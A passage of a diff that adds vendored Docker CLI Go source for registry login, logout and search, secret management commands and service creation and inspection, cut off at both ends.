+// default index, it uses the default index name for the daemon's platform,
+// not the client's platform.
+func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig {
+	configKey := index.Name
+	if index.Official {
+		configKey = ElectAuthServer(ctx, cli)
+	}
+
+	a, _ := cli.CredentialsStore(configKey).Get(configKey)
+	return a
+}
+
+// ConfigureAuth returns an AuthConfig from the specified user, password and server.
+func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) {
+	// On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210
+	if runtime.GOOS == "windows" {
+		cli.in = NewInStream(os.Stdin)
+	}
+
+	if !isDefaultRegistry {
+		serverAddress = registry.ConvertToHostname(serverAddress)
+	}
+
+	authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress)
+	if err != nil {
+		return authconfig, err
+	}
+
+	// Some links documenting this:
+	// - https://code.google.com/archive/p/mintty/issues/56
+	// - https://github.com/docker/docker/issues/15272
+	// - https://mintty.github.io/ (compatibility)
+	// Linux will hit this if you attempt `cat | docker login`, and Windows
+	// will hit this if you attempt docker login from mintty where stdin
+	// is a pipe, not a character based console.
+	if flPassword == "" && !cli.In().IsTerminal() {
+		return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device")
+	}
+
+	authconfig.Username = strings.TrimSpace(authconfig.Username)
+
+	if flUser = strings.TrimSpace(flUser); flUser == "" {
+		if isDefaultRegistry {
+			// if this is a default registry (docker hub), then display the following message.
+			fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. If you don't have a Docker ID, head over to https://hub.docker.com to create one.")
+		}
+		promptWithDefault(cli.Out(), "Username", authconfig.Username)
+		flUser = readInput(cli.In(), cli.Out())
+		flUser = strings.TrimSpace(flUser)
+		if flUser == "" {
+			flUser = authconfig.Username
+		}
+	}
+	if flUser == "" {
+		return authconfig, fmt.Errorf("Error: Non-null Username Required")
+	}
+	if flPassword == "" {
+		oldState, err := term.SaveState(cli.In().FD())
+		if err != nil {
+			return authconfig, err
+		}
+		fmt.Fprintf(cli.Out(), "Password: ")
+		term.DisableEcho(cli.In().FD(), oldState)
+
+		flPassword = readInput(cli.In(), cli.Out())
+		fmt.Fprint(cli.Out(), "\n")
+
+		term.RestoreTerminal(cli.In().FD(), oldState)
+		if flPassword == "" {
+			return authconfig, fmt.Errorf("Error: Password Required")
+		}
+	}
+
+	authconfig.Username = flUser
+	authconfig.Password = flPassword
+	authconfig.ServerAddress = serverAddress
+	authconfig.IdentityToken = ""
+
+	return authconfig, nil
+}
+
+func readInput(in io.Reader, out io.Writer) string {
+	reader := bufio.NewReader(in)
+	line, _, err := reader.ReadLine()
+	if err != nil {
+		fmt.Fprintln(out, err.Error())
+		os.Exit(1)
+	}
+	return string(line)
+}
+
+func promptWithDefault(out io.Writer, prompt string, configDefault string) {
+	if configDefault == "" {
+		fmt.Fprintf(out, "%s: ", prompt)
+	} else {
+		fmt.Fprintf(out, "%s (%s): ", prompt, configDefault)
+	}
+}
+
+// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image
+func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) {
+	// Retrieve encoded auth token from the image reference
+	authConfig, err := resolveAuthConfigFromImage(ctx, cli, image)
+	if err != nil {
+		return "", err
+	}
+	encodedAuth, err := EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return "", err
+	}
+	return encodedAuth, nil
+}
+
+// resolveAuthConfigFromImage retrieves that AuthConfig using the image string
+func resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) {
+	registryRef, err := reference.ParseNamed(image)
+	if err != nil {
+		return types.AuthConfig{}, err
+	}
+	repoInfo, err := registry.ParseRepositoryInfo(registryRef)
+	if err != nil {
+		return types.AuthConfig{}, err
+	}
+	return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go
new file mode 100644
index 0000000000..05b3bb03b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/registry/login.go
@@ -0,0 +1,85 @@
+package registry
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type loginOptions struct {
+	serverAddress string
+	user          string
+	password      string
+	email         string
+}
+
+// NewLoginCommand creates a new `docker login` command
+func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts loginOptions
+
+	cmd := &cobra.Command{
+		Use:   "login [OPTIONS] [SERVER]",
+		Short: "Log in to a Docker registry",
+		Long:  "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.",
+		Args:  cli.RequiresMaxArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if len(args) > 0 {
+				opts.serverAddress = args[0]
+			}
+			return runLogin(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.user, "username", "u", "", "Username")
+	flags.StringVarP(&opts.password, "password", "p", "", "Password")
+
+	// Deprecated in 1.11: Should be removed in docker 1.14
+	flags.StringVarP(&opts.email, "email", "e", "", "Email")
+	flags.MarkDeprecated("email", "will be removed in 1.14.")
+
+	return cmd
+}
+
+func runLogin(dockerCli *command.DockerCli, opts loginOptions) error {
+	ctx := context.Background()
+	clnt := dockerCli.Client()
+
+	var (
+		serverAddress string
+		authServer    = command.ElectAuthServer(ctx, dockerCli)
+	)
+	if opts.serverAddress != "" {
+		serverAddress = opts.serverAddress
+	} else {
+		serverAddress = authServer
+	}
+
+	isDefaultRegistry := serverAddress == authServer
+
+	authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry)
+	if err != nil {
+		return err
+	}
+	response, err := clnt.RegistryLogin(ctx, authConfig)
+	if err != nil {
+		return err
+	}
+	if response.IdentityToken != "" {
+		authConfig.Password = ""
+		authConfig.IdentityToken = response.IdentityToken
+	}
+	if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil {
+		return fmt.Errorf("Error saving credentials: %v", err)
+	}
+
+	if response.Status != "" {
+		fmt.Fprintln(dockerCli.Out(), response.Status)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go
new file mode 100644
index 0000000000..877e60e8cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/registry/logout.go
@@ -0,0 +1,77 @@
+package registry
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+)
+
+// NewLogoutCommand creates a new `docker login` command
+func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "logout [SERVER]",
+		Short: "Log out from a Docker registry",
+		Long:  "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.",
+		Args:  cli.RequiresMaxArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			var serverAddress string
+			if len(args) > 0 {
+				serverAddress = args[0]
+			}
+			return runLogout(dockerCli, serverAddress)
+		},
+	}
+
+	return cmd
+}
+
+func runLogout(dockerCli *command.DockerCli, serverAddress string) error {
+	ctx := context.Background()
+	var isDefaultRegistry bool
+
+	if serverAddress == "" {
+		serverAddress = command.ElectAuthServer(ctx, dockerCli)
+		isDefaultRegistry = true
+	}
+
+	var (
+		loggedIn        bool
+		regsToLogout    []string
+		hostnameAddress = serverAddress
+		regsToTry       = []string{serverAddress}
+	)
+	if !isDefaultRegistry {
+		hostnameAddress = registry.ConvertToHostname(serverAddress)
+		// the tries below are kept for backward compatibility where a user could have
+		// saved the registry in one of the following format.
+		regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress)
+	}
+
+	// check if we're logged in based on the records in the config file
+	// which means it couldn't have user/pass cause they may be in the creds store
+	for _, s := range regsToTry {
+		if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok {
+			loggedIn = true
+			regsToLogout = append(regsToLogout, s)
+		}
+	}
+
+	if !loggedIn {
+		fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress)
+		return nil
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress)
+	for _, r := range regsToLogout {
+		if err := dockerCli.CredentialsStore(r).Erase(r); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go
new file mode 100644
index 0000000000..124b4ae6cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/registry/search.go
@@ -0,0 +1,126 @@
+package registry
+
+import (
+	"fmt"
+	"sort"
+	"strings"
+	"text/tabwriter"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+)
+
+type searchOptions struct {
+	term    string
+	noTrunc bool
+	limit   int
+	filter  opts.FilterOpt
+
+	// Deprecated
+	stars     uint
+	automated bool
+}
+
+// NewSearchCommand creates a new `docker search` command
+func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := searchOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "search [OPTIONS] TERM",
+		Short: "Search the Docker Hub for images",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.term = args[0]
+			return runSearch(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+	flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results")
+
+	flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds")
+	flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars")
+
+	flags.MarkDeprecated("automated", "use --filter=automated=true instead")
+	flags.MarkDeprecated("stars", "use --filter=stars=3 instead")
+
+	return cmd
+}
+
+func runSearch(dockerCli *command.DockerCli, opts searchOptions) error {
+	indexInfo, err := registry.ParseSearchIndexInfo(opts.term)
+	if err != nil {
+		return err
+	}
+
+	ctx := context.Background()
+
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo)
+	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search")
+
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return err
+	}
+
+	options := types.ImageSearchOptions{
+		RegistryAuth:  encodedAuth,
+		PrivilegeFunc: requestPrivilege,
+		Filters:       opts.filter.Value(),
+		Limit:         opts.limit,
+	}
+
+	clnt := dockerCli.Client()
+
+	unorderedResults, err := clnt.ImageSearch(ctx, opts.term, options)
+	if err != nil {
+		return err
+	}
+
+	results := searchResultsByStars(unorderedResults)
+	sort.Sort(results)
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0)
+	fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n")
+	for _, res := range results {
+		// --automated and -s, --stars are deprecated since Docker 1.12
+		if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) {
+			continue
+		}
+		desc := strings.Replace(res.Description, "\n", " ", -1)
+		desc = strings.Replace(desc, "\r", " ", -1)
+		if !opts.noTrunc {
+			desc = stringutils.Ellipsis(desc, 45)
+		}
+		fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount)
+		if res.IsOfficial {
+			fmt.Fprint(w, "[OK]")
+
+		}
+		fmt.Fprint(w, "\t")
+		if res.IsAutomated {
+			fmt.Fprint(w, "[OK]")
+		}
+		fmt.Fprint(w, "\n")
+	}
+	w.Flush()
+	return nil
+}
+
+// SearchResultsByStars sorts search results in descending order by number of stars.
+type searchResultsByStars []registrytypes.SearchResult
+
+func (r searchResultsByStars) Len() int           { return len(r) }
+func (r searchResultsByStars) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
+func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount }
diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go
new file mode 100644
index 0000000000..79e669858c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/cmd.go
@@ -0,0 +1,25 @@
+package secret
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewSecretCommand returns a cobra command for `secret` subcommands
+func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "secret",
+		Short: "Manage Docker secrets",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newSecretListCommand(dockerCli),
+		newSecretCreateCommand(dockerCli),
+		newSecretInspectCommand(dockerCli),
+		newSecretRemoveCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go
new file mode 100644
index 0000000000..f4683a60f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/create.go
@@ -0,0 +1,79 @@
+package secret
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/system"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type createOptions struct {
+	name   string
+	file   string
+	labels opts.ListOpts
+}
+
+func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	createOpts := createOptions{
+		labels: opts.NewListOpts(runconfigopts.ValidateEnv),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] SECRET file|-",
+		Short: "Create a secret from a file or STDIN as content",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			createOpts.name = args[0]
+			createOpts.file = args[1]
+			return runSecretCreate(dockerCli, createOpts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.VarP(&createOpts.labels, "label", "l", "Secret labels")
+
+	return cmd
+}
+
+func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	var in io.Reader = dockerCli.In()
+	if options.file != "-" {
+		file, err := system.OpenSequential(options.file)
+		if err != nil {
+			return err
+		}
+		in = file
+		defer file.Close()
+	}
+
+	secretData, err := ioutil.ReadAll(in)
+	if err != nil {
+		return fmt.Errorf("Error reading content from %q: %v", options.file, err)
+	}
+
+	spec := swarm.SecretSpec{
+		Annotations: swarm.Annotations{
+			Name:   options.name,
+			Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()),
+		},
+		Data: secretData,
+	}
+
+	r, err := client.SecretCreate(ctx, spec)
+	if err != nil {
+		return err
+	}
+
+	fmt.Fprintln(dockerCli.Out(), r.ID)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go
new file mode 100644
index 0000000000..0a8bd4a23f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/inspect.go
@@ -0,0 +1,45 @@
+package secret
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type inspectOptions struct {
+	names  []string
+	format string
+}
+
+func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := inspectOptions{}
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] SECRET [SECRET...]",
+		Short: "Display detailed information on one or more secrets",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.names = args
+			return runSecretInspect(dockerCli, opts)
+		},
+	}
+
+	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	return cmd
+}
+
+func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	ids, err := getCliRequestedSecretIDs(ctx, client, opts.names)
+	if err != nil {
+		return err
+	}
+	getRef := func(id string) (interface{}, []byte, error) {
+		return client.SecretInspectWithRaw(ctx, id)
+	}
+
+	return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go
new file mode 100644
index 0000000000..faeab314b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/ls.go
@@ -0,0 +1,68 @@
+package secret
+
+import (
+	"fmt"
+	"text/tabwriter"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type listOptions struct {
+	quiet bool
+}
+
+func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{}
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Aliases: []string{"list"},
+		Short:   "List secrets",
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runSecretList(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
+
+	return cmd
+}
+
+func runSecretList(dockerCli *command.DockerCli, opts listOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	secrets, err := client.SecretList(ctx, types.SecretListOptions{})
+	if err != nil {
+		return err
+	}
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
+	if opts.quiet {
+		for _, s := range secrets {
+			fmt.Fprintf(w, "%s\n", s.ID)
+		}
+	} else {
+		fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED")
+		fmt.Fprintf(w, "\n")
+
+		for _, s := range secrets {
+			created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago"
+			updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago"
+
+			fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated)
+		}
+	}
+
+	w.Flush()
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go
new file mode 100644
index 0000000000..f45a619f6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/remove.go
@@ -0,0 +1,57 @@
+package secret
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type removeOptions struct {
+	names []string
+}
+
+func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return &cobra.Command{
+		Use:     "rm SECRET [SECRET...]",
+		Aliases: []string{"remove"},
+		Short:   "Remove one or more secrets",
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts := removeOptions{
+				names: args,
+			}
+			return runSecretRemove(dockerCli, opts)
+		},
+	}
+}
+
+func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	ids, err := getCliRequestedSecretIDs(ctx, client, opts.names)
+	if err != nil {
+		return err
+	}
+
+	var errs []string
+
+	for _, id := range ids {
+		if err := client.SecretRemove(ctx, id); err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+
+		fmt.Fprintln(dockerCli.Out(), id)
+	}
+
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go
new file mode 100644
index 0000000000..11d31ffd16
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/secret/utils.go
@@ -0,0 +1,76 @@
+package secret
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"golang.org/x/net/context"
+)
+
+// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names
+func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) {
+	args := filters.NewArgs()
+	for _, n := range terms {
+		args.Add("names", n)
+		args.Add("id", n)
+	}
+
+	return client.SecretList(ctx, types.SecretListOptions{
+		Filters: args,
+	})
+}
+
+func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) {
+	secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(secrets) > 0 {
+		found := make(map[string]struct{})
+	next:
+		for _, term := range terms {
+			// attempt to lookup secret by full ID
+			for _, s := range secrets {
+				if s.ID == term {
+					found[s.ID] = struct{}{}
+					continue next
+				}
+			}
+			// attempt to lookup secret by full name
+			for _, s := range secrets {
+				if s.Spec.Annotations.Name == term {
+					found[s.ID] = struct{}{}
+					continue next
+				}
+			}
+			// attempt to lookup secret by partial ID (prefix)
+			// return error if more than one matches found (ambiguous)
+			n := 0
+			for _, s := range secrets {
+				if strings.HasPrefix(s.ID, term) {
+					found[s.ID] = struct{}{}
+					n++
+				}
+			}
+			if n > 1 {
+				return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n)
+			}
+		}
+
+		// We already collected all the IDs found.
+		// Now we will remove duplicates by converting the map to slice
+		ids := []string{}
+		for id := range found {
+			ids = append(ids, id)
+		}
+
+		return ids, nil
+	}
+
+	return terms, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go
new file mode 100644
index 0000000000..796fe926c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/cmd.go
@@ -0,0 +1,29 @@
+package service
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewServiceCommand returns a cobra command for `service` subcommands
+func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "service",
+		Short: "Manage services",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newCreateCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		newPsCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		newScaleCommand(dockerCli),
+		newUpdateCommand(dockerCli),
+		newLogsCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go
new file mode 100644
index 0000000000..1355c19c65
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/create.go
@@ -0,0 +1,100 @@
+package service
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := newServiceOptions()
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
+		Short: "Create a new service",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.image = args[0]
+			if len(args) > 1 {
+				opts.args = args[1:]
+			}
+			return runCreate(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)")
+	flags.StringVar(&opts.name, flagName, "", "Service name")
+
+	addServiceFlags(cmd, opts)
+
+	flags.VarP(&opts.labels, flagLabel, "l", "Service labels")
+	flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels")
+	flags.VarP(&opts.env, flagEnv, "e", "Set environment variables")
+	flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables")
+	flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service")
+	flags.Var(&opts.constraints, flagConstraint, "Placement constraints")
+	flags.Var(&opts.networks, flagNetwork, "Network attachments")
+	flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service")
+	flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port")
+	flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container")
+	flags.Var(&opts.dns, flagDNS, "Set custom DNS servers")
+	flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options")
+	flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains")
+	flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)")
+
+	flags.SetInterspersed(false)
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error {
+	apiClient := dockerCli.Client()
+	createOpts := types.ServiceCreateOptions{}
+
+	service, err := opts.ToService()
+	if err != nil {
+		return err
+	}
+
+	specifiedSecrets := opts.secrets.Value()
+	if len(specifiedSecrets) > 0 {
+		// parse and validate secrets
+		secrets, err := ParseSecrets(apiClient, specifiedSecrets)
+		if err != nil {
+			return err
+		}
+		service.TaskTemplate.ContainerSpec.Secrets = secrets
+
+	}
+
+	ctx := context.Background()
+
+	if err := resolveServiceImageDigest(dockerCli, &service); err != nil {
+		return err
+	}
+
+	// only send auth if flag was set
+	if opts.registryAuth {
+		// Retrieve encoded auth token from the image reference
+		encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image)
+		if err != nil {
+			return err
+		}
+		createOpts.EncodedRegistryAuth = encodedAuth
+	}
+
+	response, err := apiClient.ServiceCreate(ctx, service, createOpts)
+	if err != nil {
+		return err
+	}
+
+	for _, warning := range response.Warnings {
+		fmt.Fprintln(dockerCli.Err(), warning)
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go
new file mode 100644
index 0000000000..deb701bf6d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/inspect.go
@@ -0,0 +1,84 @@
+package service
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	apiclient "github.com/docker/docker/client"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	refs   []string
+	format string
+	pretty bool
+}
+
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] SERVICE [SERVICE...]",
+		Short: "Display detailed information on one or more services",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.refs = args
+
+			if opts.pretty && len(opts.format) > 0 {
+				return fmt.Errorf("--format is incompatible with human friendly format")
+			}
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.")
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	if opts.pretty {
+		opts.format = "pretty"
+	}
+
+	getRef := func(ref string) (interface{}, []byte, error) {
+		service, _, err := client.ServiceInspectWithRaw(ctx, ref)
+		if err == nil || !apiclient.IsErrServiceNotFound(err) {
+			return service, nil, err
+		}
+		return nil, nil, fmt.Errorf("Error: no such service: %s", ref)
+	}
+
+	f := opts.format
+	if len(f) == 0 {
+		f = "raw"
+		if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 {
+			f = dockerCli.ConfigFile().ServiceInspectFormat
+		}
+	}
+
+	// check if the user is trying to apply a template to the pretty format, which
+	// is not supported
+	if strings.HasPrefix(f, "pretty") && f != "pretty" {
+		return fmt.Errorf("Cannot supply extra formatting options to the pretty template")
+	}
+
+	serviceCtx := formatter.Context{
+		Output: dockerCli.Out(),
+		Format: formatter.NewServiceFormat(f),
+	}
+
